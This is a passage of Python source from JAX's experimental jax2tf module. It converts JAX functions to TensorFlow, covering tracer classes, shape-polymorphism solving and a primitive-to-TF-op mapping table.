# We can convert directly, because all dtypes (even bfloat16) are the same
# in JAX and TF.
return tf.convert_to_tensor(val, dtype=conversion_type)
# The implementation rules for primitives. The rule will be called with the
# arguments (TfVal) and must return TfVal (or a sequence thereof,
# if primitive.multiple_results). The vast majority of primitives do not need
# to worry about core.unit inputs or results. The exception are primarily the
# control-flow primitives.
tf_impl: Dict[core.Primitive,
Callable[..., Any]] = {}
# Some primitive implementation rules need the abstract values of arguments
# and the results. This is the case for the primitives implemented using
# _convert_jax_impl and those that need to adjust the shape of the outputs
# due to missing TF shape inference rules for TFXLA ops. The rules for these
# primitives should be added to `tf_impl_with_avals`.
# The abstract value are passed to the implementation as two special kwargs
# `_in_avals` (a tuple of core.AbstractValue) and `_out_aval` (a
# core.AbstractValue, or a tuple thereof when primitive.multiple_results).
tf_impl_with_avals: Dict[core.Primitive,
Callable[..., Any]] = {}
# XLA is not linked in all environments; when converting a primitive, if this
# variable is disabled, we try harder to use only standard TF ops if they are
# applicable to the concrete use case; if the resulting conversion path ends up
# requiring a TFXLA operation, an exception is thrown instead.
_enable_xla = True
def _xla_path_disabled_error(primitive_name: str) -> Exception:
assert not _enable_xla
return NotImplementedError(
f"Call to {primitive_name} can only be converted through TFXLA, but "
"XLA is disabled")
def convert(fun: Callable, *,
in_shapes: Optional[Sequence[Any]]=None,
with_gradient=True, enable_xla=True) -> Callable:
"""Transforms `fun` to be executed by TensorFlow.
See [README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md)
for more details about usage and common problems.
Args:
fun: Function to be transformed. Its arguments and return value should be
JAX arrays, or (nested) standard Python containers (tuple/list/dict)
thereof.
in_shapes: an optional sequence of shape specifications,
one for each argument of the function to be converted. Default is a
list of `None`, in which case the argument shape specifications are taken
from the shapes of the actual arguments.
A non-default `in_shapes` is needed sometimes when the actual arguments
have partially-specified shapes. If an argument is a pytree, then the
shape specification must be a matching pytree or `None`.
See [how optional parameters are matched to arguments](https://jax.readthedocs.io/en/latest/pytrees.html#applying-optional-parameters-to-pytrees).
A shape specification should be a string, with comma-separated dimension
specifications, and optionally wrapped in parentheses. A dimension
specification is either a number, or the placeholder `_`, or a lowercase
word denoting a name for a dimension variable, or an arithmetic expression
with integer literals, dimension variables, and the operators `+` and `*`.
In presence of dimension variables, the conversion is done with a
shape abstraction that allows any concrete value for the variable.
Examples of shape specifications:
* `[None, "(batch, 16)"]`: no specification for the first argument (takes
the shape from the actual argument); the second argument is a 2D
array with the first dimension size set to a variable `batch` and the
second dimension 16.
* `["(batch, _)", "(batch,)"]`: the leading dimensions of the two arguments
must match. The second dimension of the first argument is taken from the
actual argument shape.
* `[(batch, 2 * batch)]`: a 2D matrix with the second dimension having
double the size of the first one.
See [the README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md#shape-polymorphic-conversion)
for more details.
with_gradient: if set, will add a tf.custom_gradient to the converted
function, by converting the ``jax.vjp(fun)``. Only first-order
differentiation is supported for now. If the converted function is
saved in a SavedModel, the custom gradients are currently lost and
an error will be raised if a gradient computation is attempted.
This is due to a current bug in TensorFlow.
enable_xla: if unset, the converter will try harder to use pure TF ops to
convert the function, and raise an error if it can not be converted
without resorting to XLA ops (default: True).
Returns:
A version of `fun` that expects TfVals as arguments (or
tuple/lists/dicts) thereof, and returns TfVals as outputs.
"""
global _enable_xla
_enable_xla = enable_xla
api._check_callable(fun)
def converted_fun(*args: TfVal) -> TfVal:
# TODO: is there a better way to check if we are inside a transformation?
if config.omnistaging_enabled:
if not core.trace_state_clean():
raise ValueError("convert must be used outside all JAX transformations."
+ f"Trace state: {core.thread_local_state.trace_state}")
else:
if (core.thread_local_state.trace_state.trace_stack.downward or
core.thread_local_state.trace_state.trace_stack.upward or
core.thread_local_state.trace_state.substack != [core.Sublevel(0)]):
raise ValueError("convert must be used outside all JAX transformations."
+ f"Trace state: {core.thread_local_state.trace_state}")
def check_arg(a):
if not _is_tfval(a):
msg = (f"Argument {a} of type {type(a)} of jax2tf.convert(f) should "
"be NumPy array, scalar, tf.Variable, or tf.Tensor")
raise TypeError(msg)
tree_util.tree_map(check_arg, args)
# Name input tensors
args = tuple(
tree_util.tree_map(lambda x, i=i: tf.identity(x, f"jax2tf_arg_{i}"), a) # type: ignore
for i, a in enumerate(args))
# This function may take pytrees of TfVals. We can only set
# tf.custom_gradient on functions that take a flat argument list.
args_flat, in_tree = tree_util.tree_flatten((args, {}))
if in_shapes is None:
in_shapes_ = (None,) * len(args)
else:
if not isinstance(in_shapes, Sequence) or len(args) != len(in_shapes):
msg = ("in_shapes must be a sequence as long as the argument list "
f"({len(args)}). Got in_shapes={in_shapes}.")
raise TypeError(msg)
in_shapes_ = tuple(in_shapes)
# Expand the in_shapes to match the argument pytree
in_shapes_flat = tuple(api_util.flatten_axes("jax2tf.convert in_shapes",
in_tree.children()[0], in_shapes_))
# Construct the abstract values for the flat arguments, possibly based on
# the input shapes and the in_shapes if given. May create new shape
# variables.
args_avals_flat = _input_avals(args_flat, in_shapes_flat)
f = lu.wrap_init(fun)
# out_tree_thunk() will be the output tree, after running _interpret_fun.
flat_fun, out_tree_thunk = flatten_fun(f, in_tree)
# Prepare the grad_fn for tf.custom_gradient.
def converted_grad_fn(*out_cts_flat: TfVal,
_out_cts_avals: Sequence[core.AbstractValue],
variables=None):
if variables:
raise ValueError("Unexpected variables used in forward pass. "
"This should not happen for first-order differentiation. "
f"variables={variables}")
def fun_vjp_jax(args_jax, out_cts_jax):
# One may think that we can get the pullback while we are converting
# the main function in the first place. That is problematic, because the
# pullback may contain captured tracers from the conversion of the
# main function. Those tracers will confuse the conversion of the
# pullback. So, we construct the vjp anew.
_, pullback_jax = jax.vjp(fun, *args_jax)
return pullback_jax(out_cts_jax)
if in_shapes is None:
vjp_in_shapes = None
else:
args_in_shapes = tree_util.tree_unflatten(in_tree.children()[0], in_shapes_flat)
out_cts_in_shapes = tree_util.tree_unflatten(
out_tree_thunk(),
tuple(str(out_aval.shape) for out_aval in _out_cts_avals)) # type: ignore
vjp_in_shapes = [args_in_shapes, out_cts_in_shapes]
out_cts = tree_util.tree_unflatten(out_tree_thunk(), out_cts_flat)
# TODO: enable higher-order gradients
with tf.name_scope("jax2tf_vjp"):
in_cts = convert(fun_vjp_jax, with_gradient=False,
in_shapes=vjp_in_shapes)(args, out_cts)
return in_cts
try:
global _shape_env
assert not _shape_env, f"Unexpected shape environment {_shape_env}"
_shape_env = _make_shape_env(args_avals_flat, args_flat)
if with_gradient:
@tf.custom_gradient
def converted_fun_flat_with_custom_gradient(*args_flat: TfVal) -> TfVal:
out_with_avals = _interpret_fun(flat_fun, args_flat, args_avals_flat)
outs, out_avals = util.unzip2(out_with_avals)
return (tuple(outs),
functools.partial(converted_grad_fn, _out_cts_avals=tuple(out_avals)))
out_flat = converted_fun_flat_with_custom_gradient(*args_flat)
else:
out_flat_raw = _interpret_fun(flat_fun, args_flat, args_avals_flat)
message = ("The jax2tf-converted function does not support gradients. "
"Use `with_gradient` parameter to enable gradients")
# We use PreventGradient, which is propagated through a SavedModel.
out_flat = [tf.raw_ops.PreventGradient(input=o, message=message)
for o, _ in out_flat_raw]
finally:
_shape_env = {}
out_flat = [tf.identity(x, "jax2tf_out") for x in out_flat]
out = tree_util.tree_unflatten(out_tree_thunk(), out_flat)
return out
return converted_fun
# Internals
def _interpret_fun(fun: lu.WrappedFun,
in_vals: Sequence[TfVal],
in_avals: Sequence[core.AbstractValue]
) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
new_main = core.new_base_main if config.omnistaging_enabled else core.new_main
with new_main(TensorFlowTrace) as main: # type: ignore
fun = _interpret_subtrace(fun, main, in_avals)
out_vals: Sequence[Tuple[TfVal, core.AbstractValue]] = fun.call_wrapped(*in_vals)
del main
return tuple(out_vals)
def _convert_jax_impl(jax_impl: Callable, *, multiple_results=True) -> Callable:
"""Convert the JAX implementation of a primitive.
Args:
jax_impl: typically the impl-rule for a primitive, with signature
`(*args: JaxVal, **kwargs) -> Sequence[JaxVal]`. This function implements
a primitive in terms of other primitives.
multiple_results: whether `jax_impl` returns a sequence of results.
Returns:
a function with signature `(*args: TfVal, _in_avals, _out_aval, **kwargs) -> Sequence[TfVal]`.
"""
def wrapped(*tf_args: TfVal,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue, **kwargs) -> Sequence[TfVal]:
# We wrap the jax_impl under _interpret_fun to abstract the TF values
# from jax_impl and turn them into JAX abstract values.
def jax_impl_jax_args(*jax_args):
jax_results = jax_impl(*jax_args, **kwargs)
return jax_results if multiple_results else [jax_results]
tf_results_with_avals = _interpret_fun(lu.wrap_init(jax_impl_jax_args), tf_args, _in_avals)
tf_results, _ = util.unzip2(tf_results_with_avals)
return tf_results if multiple_results else tf_results[0]
return wrapped
@lu.transformation
def _interpret_subtrace(main: core.MainTrace,
in_avals: Sequence[core.AbstractValue],
*in_vals: TfVal):
trace = TensorFlowTrace(main, core.cur_sublevel())
in_tracers = tuple(TensorFlowTracer(trace, val, aval)
for val, aval in util.safe_zip(in_vals, in_avals))
# The outs may be core.unit, see comment in TensorFlowTrace.pure.
outs = yield in_tracers, {} # type: Sequence[Union[TfVal, core.Unit]]
out_tracers: Iterable[TensorFlowTracer] = map(trace.full_raise, outs) # type: ignore
out_vals_with_avals: Sequence[Tuple[TfVal, core.AbstractValue]] = (
tuple((t.val, t.aval) for t in out_tracers))
yield out_vals_with_avals
def _interpret_jaxpr(jaxpr: core.ClosedJaxpr, *args: TfVal) -> Sequence[TfVal]:
"""Evaluates a Jaxpr with tf.Tensor arguments.
The output is a sequence of TfVal (no `core.unit`), suitable for use with TF.
"""
fun: lu.WrappedFun = lu.wrap_init(core.jaxpr_as_fun(jaxpr))
out_with_avals = _interpret_fun(fun, args, jaxpr.in_avals)
return tuple(v for v, _ in out_with_avals)
### tracer
PolyDim = Union[int, masking.Poly] # A polymorphic shape dimension
def _poly_dim_to_tf_dim(dim: PolyDim) -> Optional[int]:
if isinstance(dim, int):
return dim
elif dim.is_constant:
return int(dim)
else:
return None
def _aval_to_tf_shape(aval: core.AbstractValue) -> Tuple[Optional[int], ...]:
"""Generate a TF shape, possibly containing None for polymorphic dimensions."""
return tuple(map(_poly_dim_to_tf_dim, aval.shape)) # type: ignore[attr-defined]
def _tfval_shape_dtype(val: TfVal) -> Tuple[Sequence[Optional[int]], DType]:
"""
Called for constants that occur in the program, or for input values to the
converted function. The returned shape may have unknown components, but
only when called for inputs.
"""
if isinstance(val, (tf.Tensor, tf.Variable)):
# May be partially known
return tuple(val.shape), to_jax_dtype(val.dtype)
else: # Must be a numeric value
assert core.skip_checks or _is_tfval(val), f"Non TfVal: {val}"
raw_aval = xla.abstractify(val)
return raw_aval.shape, raw_aval.dtype # type: ignore[attr-defined]
def _input_avals(args: Sequence[TfVal], in_shapes: Sequence[Optional[str]]) -> Sequence[core.AbstractValue]:
"""Abstract values for the input arguments."""
def input_aval(arg: TfVal, in_shape: Optional[str]) -> core.AbstractValue:
"""The abstract value for an input."""
raw_shape, dtype = _tfval_shape_dtype(arg)
if in_shape is None:
if any(d is None for d in raw_shape):
msg = ("in_shape must be specified when the argument "
f"shape {raw_shape} is partially known.")
raise TypeError(msg)
else:
return core.ShapedArray(raw_shape, dtype)
in_shape_spec = masking.parse_spec(in_shape)
if len(in_shape_spec) != len(raw_shape):
msg = (f"in_shape {in_shape} has different rank than actual argument "
f"shape {raw_shape}")
raise TypeError(msg)
try:
# TODO: improve finalize_spec error reporting, so we don't have to code our own
shape = masking.finalize_spec(in_shape_spec, raw_shape)
except TypeError:
msg = (f"in_shape {in_shape} has `_` placeholders for argument shape "
f"dimensions that are unknown: {raw_shape}")
raise TypeError(msg)
for dim_idx, (s, raw_s) in enumerate(util.safe_zip(shape, raw_shape)):
s_int: Optional[int] = _poly_dim_to_tf_dim(s)
if s_int != raw_s and s_int is not None:
msg = (f"in_shape {in_shape} (resolved to {shape}) does not match "
f"argument shape {raw_shape} in dimension {dim_idx}")
raise TypeError(msg)
return core.ShapedArray(shape, dtype)
return tuple(map(input_aval, args, in_shapes))
# A shape environment maps shape variables to TfVal.
ShapeEnv = Dict[str, TfVal]
_shape_env = {} # type: ShapeEnv
def _eval_shape(shape: Sequence[PolyDim]) -> Sequence[TfVal]:
assert all(map(lambda x: x is not None, shape)), (
f"Argument shape should be a valid JAX shape but got {shape}")
return masking.eval_poly_shape(shape, _shape_env)
# Extracting a shape environment by solving the shape variables.
# The shape environment will be derived by using `tf.shape` from the
# dynamic shape of arguments, not their static shape.
def _make_shape_env(args_avals: Sequence[core.AbstractValue],
args: Sequence[TfVal]) -> Dict[str, TfVal]:
eqns = [(p, tf.shape(a)[i])
for a_aval, a in util.safe_zip(args_avals, args)
for i, p in enumerate(a_aval.shape)]
return _solve_shape_vars(eqns)
ShapeEqn = Tuple[PolyDim, TfVal]
def _solve_shape_vars(eqns: Sequence[ShapeEqn]) -> Dict[str, TfVal]:
"""Solves a number of equations "poly = tfval" into an shape environment."""
# A simple variable elimination algorithm for now
solved: Dict[str, TfVal] = {} # Already solved vars
def simplify_poly(p: PolyDim) -> Optional[Union[TfVal,
Tuple[str, TfVal, TfVal]]]:
# Simplifies polynomial given `solved`
# Returns (v, f, rest) such that p = v * f + rest, or
# rest such that p = rest, or None
v = None
f = None
rest = []
if isinstance(p, int):
return tf.constant(p)
for m, m_factor in p.items():
simpl_m: Union[str, TfVal] = simplify_mon(m, p)
if isinstance(simpl_m, str): # A var
if v is not None:
return None
v = simpl_m
f = m_factor
else: # A value
rest.append(tf.math.multiply(simpl_m, m_factor))
rest_val = functools.reduce(tf.math.add, rest, tf.constant(0))
return rest_val if v is None else (v, f, rest_val)
def simplify_mon(m: masking.Mon, in_poly: masking.Poly) -> Union[str, TfVal]:
# Simplifies monomial given `solved`
# Returns either a variable, or a solved value
if not m:
return tf.constant(1)
if m.degree > 1:
msg = ("only linear polynomials are supported as input shape "
f"specifications. Found '{m}' in '{in_poly}'.")
raise TypeError(msg)
var = list(m.keys())[0]
return solved.get(var, var)
remaining = eqns
while remaining:
new_remaining = []
for eqn in remaining:
eq_p, eq_val = eqn
p_simpl = simplify_poly(eq_p)
if p_simpl is None:
new_remaining.append(eqn)
continue
if not isinstance(p_simpl, tuple):
# TODO: add an assertion rest == eq_v
continue
var, factor, rest = p_simpl
# p = var * factor + rest
# TODO: add an assertion eq_v >= rest and (eq_v - rest) mod factor == 0
solved[var] = tf.math.floordiv(tf.math.subtract(eq_val, rest), factor)
if len(new_remaining) < len(remaining):
remaining = new_remaining
else:
msg = "Cannot solve"
raise ValueError(msg)
return solved
def shape_as_value(x):
"""Injects the shape of `x` as an array value.
**Experimental: please give feedback, and expect changes!**
This allows the use of a shape expression as array argument to JAX functions.
A typical example is for implementing a mean operation:
jnp.sum(x) / np.prod(jax2tf.shape_as_value(x))
"""
return shape_as_value_p.bind(x)
# TODO: move this to masking or to some common library, if approved
shape_as_value_p = core.Primitive("shape_as_value")
shape_as_value_p.multiple_results = True
def _shape_as_value_impl(x):
x_shape = np.shape(x)
def dim_to_int(dim: PolyDim) -> int:
dim_int = _poly_dim_to_tf_dim(dim)
if dim_int is None:
msg = ("shape_as_value is not implemented for non-constant shapes "
"except for masking and jax2tf. "
f"Has shape: {x_shape}")
raise TypeError(msg)
else:
return dim_int
return tuple(map(dim_to_int, x_shape))
shape_as_value_p.def_impl(_shape_as_value_impl)
def _shape_as_value_abstract(x_aval: core.AbstractValue) -> Sequence[core.AbstractValue]:
rank = len(x_aval.shape) # type: ignore[attr-defined]
return (core.ShapedArray((), dtypes.canonicalize_dtype(np.int_), weak_type=True),) * rank
shape_as_value_p.def_abstract_eval(_shape_as_value_abstract)
def _shape_as_value_translation(comp, x):
return xla_client._xla.ops.Tuple(comp,
tuple(xb.constant(comp, d)
for d in comp.GetShape(x).dimensions()))
xla.translations[shape_as_value_p] = _shape_as_value_translation
def _shape_as_value_jvp_rule(primals, tangents):
# The shape does not depend on the contents of the input
x, = primals
zero = ad.Zero.from_value(0.)
return shape_as_value(x), (zero,) * len(x.shape)
ad.primitive_jvps[shape_as_value_p] = _shape_as_value_jvp_rule
def _shape_as_value__batching_rule(batched_args, batch_dims):
xv, = batched_args
batch_dim, = batch_dims
batch_size = xv.shape[batch_dim]
batched_shape = shape_as_value(xv)
one_shape = batched_shape[0:batch_dim] + batched_shape[batch_dim+1:]
res = tuple(jnp.broadcast_to(d, (batch_size, 1)) for d in one_shape)
return res, (0,) * len(one_shape)
batching.primitive_batchers[shape_as_value_p] = _shape_as_value__batching_rule
def _shape_as_value_masking_rule(operands, operands_logical_shapes):
x_logical_shape, = operands_logical_shapes
return tuple(x_logical_shape)
masking.masking_rules[shape_as_value_p] = _shape_as_value_masking_rule
def _shape_as_value_tf(x: TfVal,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue) -> TfVal:
x_aval = _in_avals[0]
def dim_to_tfval(dim: PolyDim, dim_idx: int) -> TfVal:
dim_int = _poly_dim_to_tf_dim(dim)
if dim_int is not None:
return tf.convert_to_tensor(dim_int)
else:
return tf.shape(x)[dim_idx]
return tuple(dim_to_tfval(dim, dim_idx)
for dim_idx, dim in enumerate(x_aval.shape)) # type: ignore[attr-defined]
tf_impl_with_avals[shape_as_value_p] = _shape_as_value_tf
# TODO(b/26854495): pylint doesn't understand slots and inheritance.
# pylint: disable=assigning-non-slot
class TensorFlowTracer(core.Tracer):
"""Tracer class that boxes a TF value and a JAX abstract value.
In addition to the TF value we carry the JAX abstract value because there are
two cases when it cannot be recovered from the value: (a) when the abstract
value is core.abstract_unit, in which case the value is tf.nan; (b) when we
are converting with polymorphic shapes, in which case the shape of the value
may have dimensions set to `None`, which the JAX abstract value may contain
more precise information.
When the value has a partially-known shape, the dimensions marked as `None`
must correspond to non-constant dimensions in the abstract value.
See README.md for details.
"""
# val: TfVal
# _aval: core.AbstractValue
__slots__ = ["val", "_aval"]
def __init__(self, trace: 'TensorFlowTrace', val: TfVal,
aval: core.AbstractValue):
self._trace = trace
self._aval = aval
if aval is core.abstract_unit:
self.val = val
elif isinstance(val, (tf.Tensor, tf.Variable)):
val_shape, val_dtype = _tfval_shape_dtype(val)
aval_dtype = np.dtype(self._aval.dtype) # type: ignore[attr-defined]
if val_dtype != aval_dtype and (val_dtype == tf.int32 and aval_dtype == jnp.int64 or
val_dtype == tf.int64 and aval_dtype == jnp.int32 or
val_dtype == tf.float32 and aval_dtype == jnp.float64 or
val_dtype == tf.float64 and aval_dtype == jnp.float32):
# We expect that x64 values are turned into x32
val = tf.cast(val, dtype=aval_dtype)
val_dtype = aval_dtype
if not core.skip_checks:
assert aval_dtype == val_dtype, f"expected {aval_dtype} == {val_dtype}"
for aval_dim, val_dim in util.safe_zip(self._aval.shape, val_shape): # type: ignore[attr-defined]
if val_dim is None:
assert isinstance(aval_dim, masking.Poly), f"expected {self._aval.shape} == {val_shape}" # type: ignore[attr-defined]
elif not isinstance(aval_dim, masking.Poly):
assert aval_dim == val_dim, f"expected {self._aval.shape} == {val_shape}" # type: ignore[attr-defined]
else:
# We have a TF value with known shape, and the abstract shape is a polynomial
# As an extra check, verify the value if the shape env are only constants
try:
aval_int = int(masking.eval_poly(aval_dim, _shape_env))
except TypeError:
continue
assert aval_int == val_dim, f"expected {self._aval.shape} == {val_shape}. Found {aval_int} != {val_dim}." # type: ignore
self.val = val
else: # Must be a numeric value
self.val = _safe_convert_to_tensor(val, dtype=self._aval.dtype) # type: ignore[attr-defined]
@property
def aval(self):
return self._aval
def full_lower(self):
return self
class TensorFlowTrace(core.Trace):
"""Trace class that underlies the jax2tf transformation.
We are going to ensure that jax2tf.convert is never nested inside other
transformations. This is sufficient for intended use cases (converting
fully-transformed JAX code). It also simplifies our job because we do not have
to handle situations where we apply primitives on a mix of TF values and
JAX tracers from an outer transformation. E.g., for addition both the TF values
and the JAX tracers have an override and they get confused if they see values
from the other world.
Hence a TFT trace does not interact with non-TFT traces at lower-level. For
higher-order control-flow primitives we invoke recursively
_interpret_fun on the body of the conditional, which will create a nested TFT.
We do want to allow transformations nested inside a TensorFlowTrace (TFT), but
those will introduce their own MainTrace, and any operations involving those
will be done on those traces, i.e., not a concern for TFT.
"""
def pure(self, val: Union[TfVal, core.Unit]) -> TensorFlowTracer:
"""Lifts a non-Tracer into the TensorFlowTracer.
This function may be called by way of trace.full_raise.
The value may be a core.unit. During JAX transformations we sometimes
produce a Jaxpr that has arguments of abstract value core.abstract_unit
and results equal to core.unit. These are arguments and results that are
not used in the computation.
In TF world, we represent core.unit as NaN. This is safe, as these values
should never be used.
"""
if val is core.unit:
return TensorFlowTracer(self, tf.constant(np.nan, tf.float32), core.abstract_unit)
else:
shape, dtype = _tfval_shape_dtype(val)
return TensorFlowTracer(self, val, core.ShapedArray(shape, dtype))
def lift(self, val: core.Tracer) -> TensorFlowTracer:
# This would be called when we need to raise a tracer from a lower-level
# main into the TensorFlowTrace. Since the TensorFlowTrace is never nested
# inside another transform, there are no lower-level main traces.
assert False
def sublift(self, val: TensorFlowTracer) -> TensorFlowTracer:
# This is called when we need to raise a tracer from the same master,
# but a lower sublevel. This could come from a nested jit.
return TensorFlowTracer(self, val.val, val._aval)
def process_primitive(self, primitive: core.Primitive,
tracers: Sequence[TensorFlowTracer],
params) -> TensorFlowTracer:
impl, impl_needs_avals = self.get_primitive_impl(primitive)
args_avals: Sequence[core.AbstractValue] = tuple(t.aval for t in tracers)
out_aval = primitive.abstract_eval(*args_avals, **params)
args_tf: Sequence[TfVal] = [t.val for t in tracers]
if impl_needs_avals:
val_out: TfVal = impl(*args_tf, _in_avals=args_avals, # type: ignore
_out_aval=out_aval, **params)
else:
val_out = impl(*args_tf, **params)
if primitive.multiple_results:
out = [TensorFlowTracer(self, v, a)
for v, a in util.safe_zip(val_out, out_aval)] # type: ignore
else:
out = TensorFlowTracer(self, val_out, out_aval) # type: ignore
# Check that the impl rule returned a value of expected shape and dtype
# TODO: adapt this to match polymorphic shapes
if not core.skip_checks:
if primitive.multiple_results:
for o, expected_aval in zip(out, out_aval): # type: ignore
assert o.aval.strip_weak_type() == expected_aval.strip_weak_type(), (
f"{primitive}: out.aval = {o.aval}; expected {expected_aval}")
else:
assert out.aval == out_aval, ( # type: ignore
f"{primitive}: out.aval = {out.aval}; expected {out_aval}") # type: ignore
return out # type: ignore
def process_call(self, call_primitive: core.Primitive, f: lu.WrappedFun,
tracers: Sequence[TensorFlowTracer], params):
assert call_primitive.multiple_results
vals: Sequence[TfVal] = [t.val for t in tracers]
f = _interpret_subtrace(f, self.main, tuple(t.aval for t in tracers))
if call_primitive == core.named_call_p:
with tf.name_scope(_sanitize_scope_name(params["name"])):
vals_out: Sequence[Tuple[TfVal,
core.AbstractValue]] = f.call_wrapped(*vals)
elif call_primitive == sharded_jit.sharded_call_p:
vals_out = _sharded_call(f, vals, **params)
else:
vals_out = f.call_wrapped(*vals)
return [TensorFlowTracer(self, v, a) for v, a in vals_out]
def post_process_call(self, call_primitive: core.Primitive,
out_tracers: Sequence[TensorFlowTracer], params):
# We encountered a call primitive, e.g., remat_call_p, whose result
# (out_tracers) include TensorFlowTracer that were not passed through
# its arguments (captured from the environment).
vals = tuple(t.val for t in out_tracers)
main = self.main
def todo(vals: Sequence[TfVal]):
trace = TensorFlowTrace(main, core.cur_sublevel())
return [TensorFlowTracer(trace, v, out_tracer.aval)
for v, out_tracer in util.safe_zip(vals, out_tracers)]
return vals, todo
def process_map(self, map_primitive, f, tracers, params):
raise NotImplementedError("process_map")
def post_process_map(self, map_primitive, out_tracers, params):
raise NotImplementedError("post_process_map")
def process_custom_jvp_call(self, prim, fun, jvp, tracers):
# Drop the custom differentiation rule and act like a call primitive. This
# behavior is desirable because jax2tf stages code out of the JAX system, so
# there are no more JAX differentiation transformations to be applied.
del jvp # Unused.
return self.process_call(core.call_p, fun, tracers, {})
def post_process_custom_jvp_call(self, out_tracers, params):
assert False # unreachable assuming jax2tf runs with clean trace state
def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees):
# Drop the custom differentiation rule and act like a call primitive. This
# behavior is desirable because jax2tf stages code out of the JAX system, so
# there are no more JAX differentiation transformations to be applied.
del fwd, bwd, out_trees # Unused.
return self.process_call(core.call_p, fun, tracers, {})
def post_process_custom_vjp_call(self, out_tracers, params):
assert False # unreachable assuming jax2tf runs with clean trace state
def get_primitive_impl(self, p: core.Primitive) -> Tuple[Callable, bool]:
# Returns the primitive implementation and whether the implementation
# takes abstract values (see definition of tf_impl_with_avals)
try:
return tf_impl[p], False
except KeyError:
try:
return tf_impl_with_avals[p], True
except KeyError as err:
msg = "TensorFlow interpretation rule for '{}' not implemented"
raise NotImplementedError(msg.format(p)) from err
def to_tf_dtype(jax_dtype):
if jax_dtype == dtypes.float0:
return tf.float32
else:
return tf.dtypes.as_dtype(jax_dtype)
def to_jax_dtype(tf_dtype):
return tf_dtype.as_numpy_dtype
def _unexpected_primitive(p: core.Primitive, *args, **kwargs):
assert False, f"Encountered unexpected primitive {p}"
for unexpected in xla.call_translations: # Call primitives are inlined
tf_impl[unexpected] = functools.partial(_unexpected_primitive, unexpected)
# Primitives that are not yet implemented must be explicitly declared here.
tf_not_yet_impl = [
"reduce", "rng_uniform",
"igamma_grad_a",
"random_gamma_grad",
# Not high priority?
"after_all", "all_to_all", "create_token",
"infeed", "outfeed", "pmax_p",
"pmin", "ppermute", "psum", "pmax", "pgather",
"axis_index", "pdot", "all_gather",
"xla_pmap",
"call_tf",
]
try:
tf_impl[lax.tie_in_p] = lambda x, y: y
except AttributeError:
pass
tf_impl[ad_util.stop_gradient_p] = tf.stop_gradient
tf_impl[ad_util.zeros_like_p] = tf.zeros_like
def _add(x: TfVal, y: TfVal) -> TfVal:
return tf.raw_ops.AddV2(x=x, y=y)
tf_impl[ad_util.add_jaxvals_p] = _add
tf_impl[xla.device_put_p] = lambda x, device=None: x
tf_impl[lax.neg_p] = tf.math.negative
tf_impl[lax.sign_p] = tf.math.sign
tf_impl[lax.floor_p] = tf.math.floor
tf_impl[lax.ceil_p] = tf.math.ceil
def _round(operand, *, rounding_method):
if rounding_method is lax.RoundingMethod.AWAY_FROM_ZERO:
sign = tf.math.sign(operand)
operand *= sign
floor = tf.math.floor(operand)
operand -= floor
cond = tf.math.equal(operand, tf.constant(np.array(0.5), operand.dtype))
return sign * (tf.where(cond, tf.constant(np.array(1), operand.dtype),
tf.math.round(operand)) + floor)
else:
return tf.math.round(operand)
tf_impl[lax.round_p] = _round
tf_impl[lax.nextafter_p] = tf.math.nextafter
def _population_count(x):
orig_dtype = x.dtype
return tf.cast(tf.raw_ops.PopulationCount(x=x), orig_dtype)
tf_impl[lax.population_count_p] = _population_count
tf_impl[lax.is_finite_p] = tf.math.is_finite
tf_impl[lax.abs_p] = tf.math.abs
tf_impl[lax.pow_p] = tf.math.pow
tf_impl[lax.integer_pow_p] = tf.math.pow
tf_impl[lax.exp_p] = tf.math.exp
tf_impl[lax.expm1_p] = tf.math.expm1
tf_impl[lax.log_p] = tf.math.log
tf_impl[lax.log1p_p] = tf.math.log1p
tf_impl[lax.tan_p] = tf.math.tan
tf_impl[lax.tanh_p] = tf.math.tanh
tf_impl[lax.sin_p] = tf.math.sin
tf_impl[lax.sinh_p] = tf.math.sinh
tf_impl[lax.cos_p] = tf.math.cos
tf_impl[lax.cosh_p] = tf.math.cosh
tf_impl[lax.acos_p] = tf.math.acos
tf_impl[lax.asin_p] = tf.math.asin
tf_impl[lax.atan_p] = tf.math.atan
tf_impl[lax.atan2_p] = tf.math.atan2
tf_impl[lax.acosh_p] = tf.math.acosh
tf_impl[lax.atanh_p] = tf.math.atanh
tf_impl[lax.asinh_p] = tf.math.asinh
tf_impl[lax.sqrt_p] = tf.math.sqrt
tf_impl[lax.rsqrt_p] = tf.math.rsqrt
tf_impl[lax.lgamma_p] = tf.math.lgamma
tf_impl[lax.digamma_p] = tf.math.digamma
tf_impl[lax.igamma_p] = tf.math.igamma
tf_impl[lax.igammac_p] = tf.math.igammac
tf_impl[lax.regularized_incomplete_beta_p] = tf.math.betainc
tf_impl[lax.erf_p] = tf.math.erf
tf_impl[lax.erfc_p] = tf.math.erfc
tf_impl[lax.erf_inv_p] = tf.math.erfinv
tf_impl[lax.bessel_i0e_p] = tf.math.bessel_i0e
tf_impl[lax.bessel_i1e_p] = tf.math.bessel_i1e
tf_impl[lax.complex_p] = tf.complex
def _conj(x, **kwargs):
# The only dtypes that are allowed are: float32, float64, complex64, and
# complex128.
if x.dtype == tf.float32:
return tf.cast(x, tf.complex64)
elif x.dtype == tf.float64:
return tf.cast(x, tf.complex128)
else:
return tf.math.conj(x)
tf_impl[lax.conj_p] = _conj
tf_impl[lax.real_p] = tf.math.real
tf_impl[lax.imag_p] = tf.math.imag
tf_impl[lax.add_p] = _add
tf_impl[lax.sub_p] = tf.math.subtract
tf_impl[lax.mul_p] = tf.math.multiply
def _iota(*, dtype, shape, dimension):
dtype = to_tf_dtype(dtype)
# Some dtypes are unsupported, like uint32, so we just fall back to int32.
# TODO(mattjj, necula): improve tf.range dtype handling
shape_tf = _eval_shape(shape)
vec = tf.range(tf.cast(shape_tf[dimension], tf.int32), dtype=tf.int32)
vec_shape = [-1 if i == dimension else 1 for i in range(len(shape))]
return tf.cast(tf.broadcast_to(tf.reshape(vec, vec_shape), shape_tf), dtype)
tf_impl[lax.iota_p] = _iota
def _div(lhs, rhs):
if lhs.dtype.is_integer:
quotient = tf.math.floordiv(lhs, rhs)
select = tf.math.logical_and(
tf.not_equal(tf.math.sign(lhs), tf.math.sign(rhs)),
tf.not_equal(tf.math.floormod(lhs, rhs), 0))
return tf.where(select, quotient + 1, quotient)
else:
